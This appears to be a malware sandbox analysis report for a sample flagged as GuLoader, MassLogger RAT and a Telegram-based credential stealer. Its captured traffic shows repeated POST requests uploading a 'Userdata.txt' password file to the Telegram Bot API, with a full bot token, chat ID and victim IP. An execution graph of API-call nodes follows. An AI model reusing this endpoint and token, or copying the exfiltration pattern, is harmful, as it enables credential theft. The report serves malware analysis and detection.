                                                                                                            2025-01-10 20:41:55 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44685,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541715,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.850028149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:56 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd336b37c3d0f8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 62 33 37 63 33 64 30 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd336b37c3d0f8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:57 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:57 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:57 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44687,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541717,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.850030149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:58 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33815fe28e68
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 31 35 66 65 32 38 65 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33815fe28e68Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:58 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:58 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:58 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44688,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541718,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.850032149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:42:00 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd339a0f1b022a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:42:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 61 30 66 31 62 30 32 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd339a0f1b022aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:42:00 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:42:00 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:42:00 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44690,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541720,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.850034149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:42:01 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33b014664df2
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:42:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 30 31 34 36 36 34 64 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33b014664df2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:42:02 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:42:02 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:42:02 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44692,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541722,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.850036149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:42:03 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33cc7ddfd09c
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:42:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 63 37 64 64 66 64 30 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33cc7ddfd09cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:42:03 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:42:03 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 537
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:42:03 UTC537INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44694,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541723,"document":{"file_name":"U


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:15:39:56
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\xXUnP7uCBJ.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'007'802 bytes
                                                                                                            MD5 hash:37CAF3903448F4B7D38A4D8E180F54DD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2212629078.0000000003E3C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:15:40:48
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\xXUnP7uCBJ.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'007'802 bytes
                                                                                                            MD5 hash:37CAF3903448F4B7D38A4D8E180F54DD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:20.3%
                                                                                                              Dynamic/Decrypted Code Coverage:13.4%
                                                                                                              Signature Coverage:19.5%
                                                                                                              Total number of Nodes:1599
                                                                                                              Total number of Limit Nodes:38
                                                                                                              execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4186 405b78 4185->4186 4189 405b88 lstrcatW 4186->4189 4190 405b7e 4186->4190 4193 405b93 lstrlenW FindFirstFileW 4189->4193 4190->4189 4190->4193 4192 405c82 4303 405cbd lstrlenW CharPrevW 4192->4303 4195 405c59 4193->4195 4204 405bb5 4193->4204 4195->4181 4197 405c3c FindNextFileW 4201 405c52 FindClose 4197->4201 4197->4204 4198 405ab2 5 API calls 4200 405c94 4198->4200 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4195 4202->4180 4207 405450 24 API calls 4202->4207 4206 405450 24 API calls 4203->4206 4204->4197 4208 405afa 60 API calls 4204->4208 4210 405450 24 API calls 4204->4210 4276 4063e8 lstrcpynW 4204->4276 4277 405ab2 4204->4277 4285 405450 4204->4285 4296 4061ae MoveFileExW 4204->4296 4206->4180 4209 405ca5 4207->4209 4208->4204 4211 4061ae 36 API calls 4209->4211 4210->4197 4212 405cac 4211->4212 4212->4180 4223 406417 4215->4223 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4223 4220 40640a 10 API calls 4220->4219 4223->4216 4223->4219 4223->4220 4225 406545 GetSystemDirectoryW 4223->4225 4226 406558 GetWindowsDirectoryW 4223->4226 4227 40667c 5 API calls 4223->4227 4228 40640a 10 API calls 4223->4228 4229 4065d3 lstrcatW 4223->4229 4230 40658c SHGetSpecialFolderLocation 4223->4230 4241 4062b6 4223->4241 4246 40632f wsprintfW 4223->4246 4247 4063e8 lstrcpynW 4223->4247 4225->4223 4226->4223 4227->4223 4228->4223 4229->4223 4230->4223 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4230->4231 4231->4223 4233 406689 4232->4233 4235 4066f2 CharNextW 4233->4235 4238 4066ff 4233->4238 4239 4066de CharNextW 4233->4239 4240 4066ed CharNextW 4233->4240 4253 405cea 4233->4253 4234 406704 CharPrevW 4234->4238 4235->4233 4235->4238 4236 406725 4236->4173 4238->4234 4238->4236 4239->4233 4240->4235 4249 406255 4241->4249 4244 4062ea RegQueryValueExW RegCloseKey 4245 40631a 4244->4245 4245->4223 4246->4223 4247->4223 4248->4217 4250 406264 4249->4250 4251 40626d RegOpenKeyExW 4250->4251 4252 406268 4250->4252 4251->4252 4252->4244 4252->4245 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4233 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4204 4313 405eb9 GetFileAttributesW 4277->4313 4280 405ad5 DeleteFileW 4282 405adb 4280->4282 4281 405acd RemoveDirectoryW 4281->4282 4283 405adf 4282->4283 4284 405aeb SetFileAttributesW 4282->4284 4283->4204 4284->4283 4286 40546b 4285->4286 4295 40550d 4285->4295 4287 405487 lstrlenW 4286->4287 4288 40640a 17 API calls 4286->4288 4289 4054b0 4287->4289 4290 405495 lstrlenW 4287->4290 4288->4287 4292 4054c3 4289->4292 4293 4054b6 SetWindowTextW 4289->4293 4291 4054a7 lstrcatW 4290->4291 4290->4295 4291->4289 4294 4054c9 SendMessageW SendMessageW SendMessageW 4292->4294 4292->4295 4293->4292 4294->4295 4295->4204 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4204 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4192 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4310 405d97 4307->4310 4309 405d92 CharNextW 4308->4309 4308->4310 4312 405dbb 4309->4312 4311 405cea CharNextW 4310->4311 4310->4312 4311->4310 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4283 4315->4314 4317 406064 